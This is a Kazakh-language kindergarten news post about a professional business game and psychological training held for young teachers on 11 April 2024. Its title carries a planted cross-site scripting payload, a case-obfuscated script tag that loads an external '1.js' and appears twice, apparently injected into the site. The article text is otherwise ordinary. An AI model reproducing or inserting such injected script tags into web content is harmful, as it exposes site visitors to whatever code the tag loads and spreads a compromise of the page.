«Жас мамандар» мектебінің іскерлік ойыны.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.04.2024

«Балдырған» бөбекжайында жас мамандармен жоспарға сай іс-шара өткізілді. Тәлімгер А.Т.Тулебаева  педагогтармен «Жетістікке жету жолдарын педагогикалық ұйымдастыру әдістері» тақырыбында іскерлік ойыны ұйымдастырылды. Мақсаты:   Жас мамандардың  жан-жақты білімділігін, ең озық, тиімді әдістерді  анықтау. Педагогтердің  кәсіби құлшынысын арттыру,  орнықтыру.  Жас  мамандарға ұйымдастырылған іс-әрекетте қолданылатын түрлі әдіс-тәсілдер, бағалаудың түрлері туралы мәліметтер берді. Бөбекжай педагог-психологі А.А.Жахина  жас мамандармен психологиялық тренинг өткізіп,сауалнама алды. Сонымен қатар «Жас мамандар» мектебінің жетекшісі Ж.О.Шакиева  жас мамандарға ұйымдастырылған  және ойын іс-әрекеттерінде тиімді әдіс-тәсілдермен, технологияларды қолданып, көрнекі құралдар мен толықтырулар ұсынылды.

Просмотров: 547


Пікір қосу



Деректерді қолтаңбаға қосу